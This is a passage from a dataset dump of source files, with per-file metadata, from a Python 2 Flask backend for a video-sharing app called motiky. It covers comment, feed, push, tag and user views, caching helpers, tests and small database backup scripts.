get_post_comment_count(post_id,show=True):\n _ans = [Comment.show == True,] if show else []\n _ans.append(Comment.post_id == post_id)\n q = reduce(db.and_,_ans)\n count = Comment.query.filter(q).count()\n return count\n\n@register('add_comment_count')\ndef add_comment_count(post_id,step=1):\n count_key = 'POST::COMMENT_COUNT::%s' % str(post_id)\n if redis.exists(count_key):\n rp = redis.pipeline()\n rp.incr(count_key).expire(count_key,24*5*3600).execute()\n\n\n\n" }, { "alpha_fraction": 0.6944212913513184, "alphanum_fraction": 0.6952539682388306, "avg_line_length": 22.54901885986328, "blob_id": "1cc06a6d4e0ae030592cc09ec3fd3c86293761dd", "content_id": "a5e2d1bb8c3067c43109a8e0d71832bb0bf57027", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1201, "license_type": "no_license", "max_line_length": 70, "num_lines": 51, "path": "/motiky/views/push.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport sys \nimport time\nimport logging\n\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom missing import authutil\nfrom missing.site import instance\nfrom missing.logic import backend\nfrom missing.coreutil import BackendError\nfrom missing.configs import redis,rq\n\ninstance = Blueprint('push',__name__)\n\n\[email protected]('/push',methods=('POST',))\ndef push():\n \"\"\"\n user_id:int\n data:{\n 'alert':str,\n 'sound':str,\n 'custom':dict\n }\n https://github.com/simonwhitaker/PyAPNs\n \"\"\"\n if not request.json:\n return jsonify(error='content-type should be json')\n if not set(['user_id','data']).issubset(set(request.json.keys())):\n return jsonify(error='params error')\n\n user_id = request.json['user_id']\n data = request.json['data']\n\n rq.enqueue('onepiece.worker.apns_push',user_id=user_id,data=data)\n \n return jsonify(ok='push is in the queue')\n" }, { "alpha_fraction": 0.6025130152702332, "alphanum_fraction": 0.6068035364151001, "avg_line_length": 29.212963104248047, "blob_id": "cd420b550f13c87e00541a6e309e58813656cf0d", "content_id": "dbbfd181298e6aa4e63fe724ba3bf536c733ded8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3263, "license_type": "no_license", "max_line_length": 107, "num_lines": 108, "path": "/motiky/logic/logic_feed.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-10\n\nimport os\nimport types\nimport traceback\nfrom datetime import datetime\n\nfrom flask import current_app\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Tag,Activity,UserFollowAsso\n\nfrom motiky.configs import db,DefaultConfig\n\n\nNEW_FEED_SQL = \"\"\"\n SELECT id FROM answer WHERE show=true AND date_create > %(last_update_time)s \n AND (%(following_limit)s) LIMIT 1\n \"\"\"\n\nGET_LATEST_FEED_SQL = \"\"\"\n SELECT id,title,pic_small,pic_big,video_url,author_id,show,recommended,play_count,\n date_create,date_update,date_publish FROM post WHERE date_create < %(now)s AND show=true \n AND (%(following_limit)s) ORDER BY date_create DESC \n LIMIT %(limit)s OFFSET %(offset)s\n \"\"\"\n \nVALUE_LIST = 
['id','title','pic_small','pic_big','video_url','author_id',\n 'show','recommended','play_count','date_create','date_update',\n 'date_publish']\n\ndef _get_following_user(user_id):\n fu = UserFollowAsso.query.filter(UserFollowAsso.user_id == user_id).all()\n if fu:\n fuids = [u.user_id_to for u in fu if u]\n else:\n fuids = []\n return fuids\n\n@register('get_new_feed')\ndef get_new_feed(user_id,last_update_time):\n\n fus = _get_following_user(user_id)\n fus.extend([user_id])\n fus = set(fus)\n\n following_limit = []\n if fus:\n following_limit.append('author_id IN (%s)' % ','.join([repr(uid) for uid in fus]))\n else:\n following_limit.append('1=1')\n\n following_limit.append('recommended = true')\n\n following_limit = ' OR '.join(following_limit)\n\n sql = NEW_FEED_SQL % {'following_limit':following_limit,'last_update_time':repr(str(last_update_time))}\n\n res = db.session.execute(sql).fetchall()\n return True if len(res) else False\n\n@register('get_latest_feed')\ndef get_latest_feed(user_id,limit,offset):\n \n qd = {\n 'limit':repr(limit),\n 'offset':repr(offset)\n }\n \n fus = _get_following_user(user_id)\n fus.extend([user_id])\n fus = set(fus)\n \n following_limit = []\n if fus:\n following_limit.append('author_id IN (%s)' % ','.join([repr(uid) for uid in fus]))\n else:\n following_limit.append('1=1')\n\n following_limit.append('recommended = true')\n\n following_limit = ' OR '.join(following_limit)\n\n _now = repr(str(datetime.now()))\n\n qd.update({'following_limit':following_limit,'now':_now})\n sql = GET_LATEST_FEED_SQL % qd\n\n print sql\n\n video_url_prefix = '/' if not current_app else current_app.config.get('VIDEO_URL_PREFIX')\n\n res = db.session.execute(sql).fetchall()\n ress = []\n for re in res:\n _dict = dict(zip(VALUE_LIST,re))\n _dict.update({\n 'date_create':_dict['date_create'].strftime('%Y-%m-%d %H:%M:%S'),\n 'date_update':_dict['date_update'].strftime('%Y-%m-%d %H:%M:%S'),\n 'date_publish':_dict['date_publish'].strftime('%Y-%m-%d %H:%M:%S'),\n 'video_url':os.path.join(video_url_prefix,_dict['video_url'] or ''),\n 'pic_small':os.path.join(video_url_prefix,_dict['pic_small'] or ''),\n })\n ress.append(_dict)\n return ress\n" }, { "alpha_fraction": 0.61654132604599, "alphanum_fraction": 0.6224772334098816, "avg_line_length": 29.08333396911621, "blob_id": "44f932b695c2ea359ea8d368798291523348f26a", "content_id": "6db7b73c2c8a1c0edbff044f972226070a250268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2527, "license_type": "no_license", "max_line_length": 97, "num_lines": 84, "path": "/motiky/views/feed.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n# date: 2013-04-10\n\nimport sys \nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.configs import redis\n\ninstance = Blueprint('feed',__name__)\n\nFEED_UPDATE_TIME_KEY = 'FEED::UPDATETIME::%(user_id)s'\n\ndef pipe_load(feeds):\n # todo some pipe load\n feeds_ret = []\n for po in feeds:\n try:\n user = backend.get_user(po['author_id'])\n po['user'] = user\n 
po['like_count'] = backend.get_post_liked_count(po['id'])\n po['comment_count'] = backend.get_post_comment_count(po['id']) \n except BackendError,ex:\n continue\n return feeds\n\nclass NewFeedView(MethodView):\n\n def get(self,user_id):\n feed_time_meta = redis.hgetall(FEED_UPDATE_TIME_KEY % {'user_id':user_id})\n try:\n last_update_time = int(feed_time_meta.get('last_update_time'))\n except:\n last_update_time = int(time.time())\n\n last_update_time = datetime.fromtimestamp(last_update_time)\n res = backend.get_new_feed(user_id,last_update_time)\n return jsonify(has_new=res)\n\nclass FeedsView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 10\n offset = (page-1) * limit\n \n feeds = backend.get_latest_feed(user_id,limit,offset)\n\n if len(feeds) > 0:\n feeds = pipe_load(feeds) \n \n curr_user = backend.get_user_by_uid(g.ukey)\n liked_post_ids = [p['id'] for p in feeds]\n liked_dict = backend.is_like_post(curr_user['id'],liked_post_ids)\n for up in feeds:\n up['is_like'] = liked_dict.get(up['id']) or False\n\n if page == 1:\n redis.hset(FEED_UPDATE_TIME_KEY % {'user_id':user_id},\n 'last_update_time',int(time.time()))\n return jsonify(results=feeds,page=page)\n\ninstance.add_url_rule('/feeds/<int:user_id>',view_func=FeedsView.as_view('feed'))\ninstance.add_url_rule('/feeds/notify/<int:user_id>',view_func=NewFeedView.as_view('feed_notify'))\n" }, { "alpha_fraction": 0.5175958871841431, "alphanum_fraction": 0.5385527610778809, "avg_line_length": 30.4375, "blob_id": "c320b55fb95b685f767a0b8df0a04c7c700710bf", "content_id": "f00214384ad8169ab6d856658b0891432668659b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2529, "license_type": "no_license", "max_line_length": 81, "num_lines": 80, "path": "/tests/test_activity.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestActivity(TestCase):\n\n\n def test_user_activity_view(self):\n\n # get\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n \n comment1 = backend.add_comment(post1['id'],'comment1',user1['id'])\n\n ac1 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'to_id':user2['id'],\n 'atype':'like'\n }\n ac2 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'comment_id':comment1['id'],\n 'to_id':user2['id'],\n 'atype':'comment'\n }\n\n\n ret = backend.add_activity(ac1)\n ret = backend.add_activity(ac2)\n backend.new_install(user2['id'],'device_token')\n\n headers = self.generate_header('weibo_id2')\n resp = self.client.get('/user/%d/activity' % user2['id'],headers=headers)\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert len(_data['results']) == 2\n\n redis.flushall()\n redis.hset('ACTIVITY::UPDATETIME::%(user_id)s' % {'user_id':user2['id']},\n 'last_update_time',int(time.time() - 3600 * 6))\n\n 
resp = self.client.get('/user/%d/activity/count' % user2['id'],\n headers=headers)\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['count'] == 2\n\n redis.hset('ACTIVITY::UPDATETIME::%(user_id)s' % {'user_id':user2['id']},\n 'last_update_time',int(time.time()) + 2)\n\n resp = self.client.get('/user/%d/activity/count' % user2['id'],\n headers=headers)\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['count'] == 0\n\n\n\n\n \n\n" }, { "alpha_fraction": 0.6745964288711548, "alphanum_fraction": 0.6847918629646301, "avg_line_length": 29.894737243652344, "blob_id": "4a4c053ca322cc3285b3c242f963c03187219526", "content_id": "f0df987921002baef0ca6b3708412b39f06330bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1177, "license_type": "no_license", "max_line_length": 85, "num_lines": 38, "path": "/motiky/logic/logic_activity.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-10\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Tag,Activity\n\nfrom motiky.configs import db\n\n@register('add_activity')\ndef add_activity(ainfo):\n act = Activity(**ainfo)\n try:\n db.session.add(act)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return act.json\n\n@register('get_new_activity_count')\ndef get_new_activity_count(user_id,last_update_time):\n assert_error(type(user_id) == types.IntType,'ParamError')\n count = Activity.query.filter(Activity.to_id == user_id).\\\n filter(Activity.date_create > last_update_time).count()\n return count\n\n@register('get_activity_by_user')\ndef get_activity_by_user(user_id,limit=30,offset=0):\n assert_error(type(user_id) == types.IntType,'ParamError')\n activitys = Activity.query.filter(Activity.to_id == user_id).\\\n order_by(db.desc(Activity.date_create)).limit(limit).offset(offset).all()\n return [a.json for a in activitys]\n\n\n\n" }, { "alpha_fraction": 0.5830469727516174, "alphanum_fraction": 0.6231386065483093, "avg_line_length": 29.59649085998535, "blob_id": "6b5ffc97aae9e3447c3d86e692b3131b1d2610af", "content_id": "7d7de02d8510eb50fbf7498063850e99d4131fd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1746, "license_type": "no_license", "max_line_length": 74, "num_lines": 57, "path": "/tests/test_feed.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestFeed(TestCase):\n\n\n def test_feeds_view(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03') \n user4 = backend.add_user('username04','photo_url04','weibo_id04')\n\n post1 = backend.add_post('title01',user1['id'],'video_url01',\n pic_small='pic_small01')\n post2 = 
backend.add_post('title02',user2['id'],'video_url02',\n pic_small='pic_small')\n post3 = backend.add_post('title03',user3['id'],'video_url03',\n pic_small='pic_small03')\n post4 = backend.add_post('title04',user4['id'],'video_url04',\n pic_small='pic_small04')\n\n backend.follow_user(user4['id'],user1['id'])\n backend.follow_user(user4['id'],user2['id'])\n\n headers = self.generate_header('weibo_id04')\n\n resp = self.client.get('/feeds/%d' % user4['id'],headers=headers)\n ret = json.loads(resp.data)\n assert len(ret['results']) == 3\n\n\n backend.set_post(post3['id'],{'recommended':True})\n\n resp = self.client.get('/feeds/%d'% user4['id'],headers=headers)\n ret = json.loads(resp.data)\n\n assert len(ret['results']) == 4\n\n\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 42, "blob_id": "5749c024e75be9302b489d880b730ee6ffad5bb2", "content_id": "91ef97cc6cb7aa8adaa2246a7a60e44764e65092", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 86, "license_type": "no_license", "max_line_length": 67, "num_lines": 2, "path": "/scripts/sync.sh", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\nrsync -ravz --exclude=.hg wwwuser@host:/data/backups /data/backups\n" }, { "alpha_fraction": 0.5908882021903992, "alphanum_fraction": 0.6115968823432922, "avg_line_length": 26.468355178833008, "blob_id": "51b39ec8011999f62d22128c338eab9f318b9036", "content_id": "11a485c04eac47f7a7c9f69a0269c5c2584aca74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2211, "license_type": "no_license", "max_line_length": 69, "num_lines": 79, "path": "/motiky/logic/logic_tag.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-10\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Tag,Tagging\n\nfrom motiky.configs import db\n\n# 99999999 编辑推荐\n# 99999998 热门\n# 这里应该排除推荐推荐和热门\n@register('get_all_tags')\ndef get_all_tags():\n tags = Tag.query.filter(Tag.show == True).\\\n filter(db.not_(Tag.id.in_([99999999,99999998]))).\\\n order_by(Tag.order_seq.desc()).all()\n return [tag.json for tag in tags]\n\n@register('get_recommend_tags')\ndef get_recommend_tags():\n tags = Tag.query.filter(Tag.show == True).\\\n filter(Tag.recommended == True).\\\n order_by(Tag.order_seq.desc()).all()\n return [tag.json for tag in tags]\n\n@register('get_tag')\ndef get_tag(tag_id):\n assert_error(type(tag_id) == types.IntType,'ParamError')\n tag = Tag.query.get(tag_id)\n return tag.json\n\n@register('get_tag_post_count')\ndef get_tag_post_count(tag_id):\n assert_error(type(tag_id) == types.IntType,'ParamError')\n count = Tagging.query.filter(Tagging.tag_id == tag_id).count()\n return count\n\n@register('get_tag_post')\ndef get_tag_post(tag_id,limit=10,offset=0):\n assert_error(offset>=0,'ParamError')\n posts = Post.query.join(Tagging,Post.id == Tagging.taggable_id).\\\n filter(Tagging.tag_id == tag_id).\\\n filter(Post.show == True).\\\n order_by(Tagging.date_create.desc()).\\\n limit(limit).offset(offset).all()\n return [p.json for p in posts];\n\ndef _get_tag_id(tagstr):\n tag = Tag.query.filter(Tag.name == tagstr).first()\n if tag:\n return tag.id\n _tag = Tag(name=tagstr)\n try:\n db.session.add(_tag)\n db.session.commit()\n except:\n pass\n else:\n return _tag.id\n\n return 
None\n\n@register('add_post_tag')\ndef add_post_tag(post_id,tags):\n for tag in tags:\n t = _get_tag_id(tag)\n if t is None:\n continue\n try:\n tagging = Tagging(taggable_id=post_id,tag_id=t)\n db.session.add(tagging)\n db.session.commit()\n except:\n db.session.rollback()\n\n\n\n" }, { "alpha_fraction": 0.5325779318809509, "alphanum_fraction": 0.5387586951255798, "avg_line_length": 31.066116333007812, "blob_id": "58b0f27f74ca6f194e01505956ce981dc79248e9", "content_id": "271126e6ab69c1bb8637bf04a907897c23d57f4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4141, "license_type": "no_license", "max_line_length": 86, "num_lines": 121, "path": "/motiky/cacheutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# File: cacheutil.py\n\n\"\"\"\n一个进程内缓存的实现 应急的时候才用 并不是很安全\n\"\"\"\nimport types\nimport time\nimport hashlib\nimport json\n\nfrom motiky.configs import redis\n\nLOCALCACHE_POOL={} #本地缓存字典\nLOCALCACHE_MAX_ITEM_COUNT=10000 #最大存储对象数量\nLOCALCACHE_KILL_COUNT=1000 #缓存满时删除对象数量\n\n\ndef rcache(timeout, cachekey=None):\n \"\"\"基于redis 的函数调用缓存\"\"\"\n def inter1(func):\n def inter2(*args,**kwargs):\n if cachekey is not None:\n callstr = cachekey\n else:\n params = map(lambda xx:repr(xx),args)\n for (k,v) in kwargs.items():\n params.append('%s=%s'%(k,repr(v)))\n callstr='CALLCACHE::%s(%s)' % (func.func_name,','.join(params))\n retobj = redis.get(callstr)\n if retobj:\n return json.loads(retobj)\n retobj = func(*args,**kwargs)\n rp = redis.pipeline()\n rp.set(callstr,json.dumps(retobj)).expire(callstr,timeout).execute()\n return retobj\n return inter2\n return inter1\n\ndef delete_cache(cachekey=None):\n \"\"\"用相同的参数删除rcache\"\"\"\n def inter1(func):\n def inter2(*args,**kwargs):\n if cachekey is not None:\n callstr = cachekey\n else:\n params = map(lambda xx:repr(xx),args)\n for (k,v) in kwargs.items():\n params.append('%s=%s'%(k,repr(v)))\n callstr='CALLCACHE::%s(%s)' % (func.func_name,','.join(params))\n redis.delete(callstr)\n return inter2\n return inter1\n\ndef ugc_control_set(user_id,obj_type,obj_id,timeout):\n \"\"\"\n 设置UGC的时间\n 可以在执行ugc操作之前先过来set 一下,如果返回True则允许下一步\n False则因为太频繁不允许ugc\n \"\"\"\n assert type(user_id) == types.IntType\n assert type(timeout) == types.IntType\n q = {\n 'user_id':user_id,\n 'obj_type':obj_type,\n 'obj_id':obj_id\n }\n _key = \"\"\"UGC::%(user_id)s::%(obj_type)s::%(obj_id)s\"\"\" % q\n ret = redis.get(_key)\n if ret != None:\n return False\n else:\n redis.pipeline().set(_key,'on').expire(_key,timeout).execute()\n return True\n\ndef callcache(timeout):\n \"\"\"函数的调用缓存\"\"\"\n def inter1(func):\n def inter2(*args,**kwargs):\n params=map(lambda xx:repr(xx),args)\n for (k,v) in kwargs.items():\n params.append('%s=%s'%(k,repr(v)))\n callstr='%s(%s)'%(func.__name__,','.join(params))\n try:\n cachedict=LOCALCACHE_POOL[callstr]\n if cachedict['timeout']==None:\n return cachedict['return']\n elif cachedict['timeout']>time.time():\n return cachedict['return']\n else:\n del LOCALCACHE_POOL[callstr]\n except KeyError:\n pass\n retobj=func(*args,**kwargs)\n if len(LOCALCACHE_POOL)>=LOCALCACHE_MAX_ITEM_COUNT:\n clear_localcache()\n cachedict={'return':retobj,}\n if timeout:\n cachedict['timeout']=int(time.time())+timeout\n else:\n cachedict['timeout']=None\n LOCALCACHE_POOL[callstr]=cachedict\n return retobj\n return inter2\n return inter1\n\n\ndef clear_localcache():\n \"\"\"将本地缓存清理出一块空间来\"\"\"\n for (callstr,cachedict) in LOCALCACHE_POOL.items():\n if 
cachedict['timeout']<time.time():\n del LOCALCACHE_POOL[callstr] #删除已经超时的\n #need_del_left=len(LOCALCACHE_POOL)-LOCALCACHE_MAX_ITEM_COUNT\n need_del_left=len(LOCALCACHE_POOL)+LOCALCACHE_KILL_COUNT-LOCALCACHE_MAX_ITEM_COUNT\n for (callstr,cachedict) in LOCALCACHE_POOL.items():\n if cachedict['timeout']!=None:\n del LOCALCACHE_POOL[callstr]\n need_del_left-=1\n if need_del_left<=0:\n break\n return\n\n\n\n" }, { "alpha_fraction": 0.426086962223053, "alphanum_fraction": 0.508695662021637, "avg_line_length": 9.5, "blob_id": "e7c29677d77b83e9cb05a821c7a70c010a817e6b", "content_id": "a332e4e6457f8733ee4922dd2cdcded5a6a8fed8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 238, "license_type": "no_license", "max_line_length": 52, "num_lines": 22, "path": "/docs/motiky-api-doc.md", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "* 获取tags 列表\n\n```\nGET /tags\n\nRESPONSE \n\n{\n\t'results':[\n\t\t{\n\t\t\t'id':int,\n\t\t\t'name':str,\n\t\t\t'show':bool,\n\t\t\t'pic_url':str,\n\t\t\t'order_seq':int,\n\t\t\t'recommended':bool,\n\t\t\t'date_create':str => '1988-12-13 00:00:00.12345'\n\t\t},\n\t]\n}\n\n```" }, { "alpha_fraction": 0.7105262875556946, "alphanum_fraction": 0.7105262875556946, "avg_line_length": 37, "blob_id": "1d93d2ec375ef0b0826bba7cff9e81f1fdfe62ef", "content_id": "aa26c61695ca90798275f5b32929537b5269b782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 114, "license_type": "no_license", "max_line_length": 70, "num_lines": 3, "path": "/scripts/pg_backup.sh", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#!/bin/bash\nexport PGPASSWORD='password'\npg_dump -Uuser -hlocalhost -a -f /data/backups/`date +%F`.sql database\n" }, { "alpha_fraction": 0.7386091351509094, "alphanum_fraction": 0.743405282497406, "avg_line_length": 15.038461685180664, "blob_id": "9bb7c9d2f343e2267062eccac398fc7b3a9ca3b5", "content_id": "80a2c52f3550b04dfb5dee20e724f89bd9c47918", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 417, "license_type": "no_license", "max_line_length": 58, "num_lines": 26, "path": "/scripts/notify_data.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#/usr/bin/evn python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport traceback\n\nsys.path.insert(0,'../')\n\nfrom komandr import *\n\nfrom motiky.logic.models import User,Post,Comment,Activity\n\nfrom motiky import create_app\nfrom motiky import configs\nfrom motiky.configs import db\n\napp = create_app(configs.ProductionConfig)\n\n@command('generate_notify_data')\ndef generate_notify_data():\n pass\n\n\nmain()\n" }, { "alpha_fraction": 0.5618235468864441, "alphanum_fraction": 0.5673991441726685, "avg_line_length": 26.672727584838867, "blob_id": "9de450161e35c11ab57783687e44f3daad49d12b", "content_id": "da82b4839ae447d8a8147476786d88c3e2d27ed8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3049, "license_type": "no_license", "max_line_length": 75, "num_lines": 110, "path": "/motiky/views/comment.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport os\nimport sys\nimport md5\nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import 
Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask import abort\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky import strutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.upyun import UpYun,md5,md5file\n\nfrom motiky.schema import NewCommentSchema\n\ninstance = Blueprint('comment',__name__)\n\n\nclass CommentView(MethodView):\n\n    def post(self):\n        data = NewCommentSchema().deserialize(request.json)\n        \n        user = backend.get_user(data['author_id'])\n\n        post = backend.get_post(data['post_id'])\n\n        if user['uid'] != g.ukey:\n            return jsonify(error='not the user')\n        \n        try:\n            comment = backend.add_comment(\n                data['post_id'],\n                data['content'].encode('utf-8'),\n                data['author_id']\n            )\n        except BackendError,ex:\n            raise\n\n        if post['author_id'] != data['author_id']:\n            try:\n                backend.add_activity({\n                    'post_id':data['post_id'],\n                    'comment_id':comment['id'],\n                    'from_id':data['author_id'],\n                    'to_id':post['author_id'],\n                    'atype':'comment'\n                })\n            except BackendError,ex:\n                pass\n\n        return jsonify(**comment)\n\n    def delete(self,comment_id):\n        comment = backend.get_comment(comment_id)\n        try:\n            backend.set_comment(comment_id,{'show':False})\n        except BackendError,ex:\n            abort(501)\n        else:\n            return '',204\n\n\nclass PostCommentsView(MethodView):\n\n    def get(self,post_id):\n        try:\n            page = int(request.values.get('page','1'))\n        except:\n            page = 1\n\n        limit = 20\n        offset = (page-1)*limit\n\n        comments = backend.get_post_comment(post_id,\n                limit=limit,offset=offset)\n\n        for comment in comments:\n            user = backend.get_user(comment['author_id'])\n            comment['user'] = user\n\n        count = backend.get_post_comment_count(post_id)\n        total_page = (count + limit -1 ) / limit\n        return jsonify(comments=comments,page=page,total_page=total_page)\n\n\ninstance.add_url_rule('/comment',view_func=CommentView.as_view('comment'),\n        methods=['POST'])\ninstance.add_url_rule('/comment/<int:comment_id>',\n        view_func=CommentView.as_view('comment_delete'),\n        methods=['DELETE'])\ninstance.add_url_rule('/post/<int:post_id>/comment',\n        view_func=PostCommentsView.as_view('post_comment'),\n        methods=['GET'])\n\n\n\n\n\n" }, { "alpha_fraction": 0.5399194359779358, "alphanum_fraction": 0.5446576476097107, "avg_line_length": 31.97265625, "blob_id": "3345765d362e9e335a09e855bbdae8abda4299a7", "content_id": "28b6e944f128f4d56bbf75d35d557c3728a08daf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8472, "license_type": "no_license", "max_line_length": 102, "num_lines": 256, "path": "/motiky/views/user.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport sys \nimport time\nimport logging\nfrom datetime import datetime\n\nimport requests\n\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.schema import NewUserSchema,UpdateUserSchema,UserFollowSchema,\\\n        InstallSchema,PushSchema\n\ninstance = Blueprint('user',__name__)\n\nclass UserView(MethodView):\n\n    def 
get(self,user_id):\n        user = backend.get_user(user_id)\n        return jsonify(**user)\n\n    def get_weibo_info(self,uid,access_token):\n        if current_app.config.get('CONFIG_TYPE') == 'test':\n            return {'username':'notedit',\n                    'photo_url':'photo_url',\n                    'signature':'signature'}\n\n        resp = requests.get('https://api.weibo.com/2/users/show.json',\n                params={\n                    'uid':uid,\n                    'access_token':access_token\n                })\n        _ = resp.json\n        return {'username':_['screen_name'],\n                'photo_url':_['avatar_large'],\n                'signature':_['description']}\n\n\n    def post(self):\n        data = NewUserSchema().deserialize(request.json)\n        try:\n            user = backend.get_user_by_uid(data['uid'].encode('utf-8'))\n            user = backend.set_user(user['id'],\n                    {\n                        'uid':data['uid'].encode('utf-8'),\n                        'access_token':data['access_token'].encode('utf-8')\n                    })\n        except BackendError,ex:\n            if ex.message == 'EmptyError':\n                user = {}\n            else:\n                return jsonify(error='server error')\n        else:\n            return jsonify(**user)\n\n        _data = self.get_weibo_info(data['uid'],data['access_token'])\n        data.update(_data)\n        try:\n            user = backend.add_user(\n                data['username'].encode('utf-8'),\n                data['photo_url'].encode('utf-8'),\n                data['uid'].encode('utf-8'),\n                data['signature'].encode('utf-8'),\n                data['access_token'].encode('utf-8')\n            )\n        except BackendError,ex:\n            return jsonify(error='add new user error')\n\n        user.update({'new':True})\n        return jsonify(**user)\n\n    def put(self,user_id):\n        data = UpdateUserSchema().deserialize(request.json)\n        try:\n            user = backend.set_user(user_id,data)\n        except BackendError,ex:\n            raise ex\n        else:\n            return '',204\n\n\nclass InstallView(MethodView):\n\n    def post(self):\n        data = InstallSchema().deserialize(request.json)\n        \n        user_id = data['user_id']\n        try:\n            install = backend.get_install_by_user(user_id)\n        except BackendError,ex:\n            install = None\n\n        if not install:\n            install = backend.new_install(\n                    data['user_id'],\n                    data['device_token'].encode('utf-8'),\n                    data['version'],\n                    data['device_type'])\n\n        return jsonify(install_id=install['id'])\n\n\nclass UserFollowView(MethodView):\n\n    def post(self):\n        '''Follow one or more users.'''\n        data = UserFollowSchema().deserialize(request.json)\n        from_id = 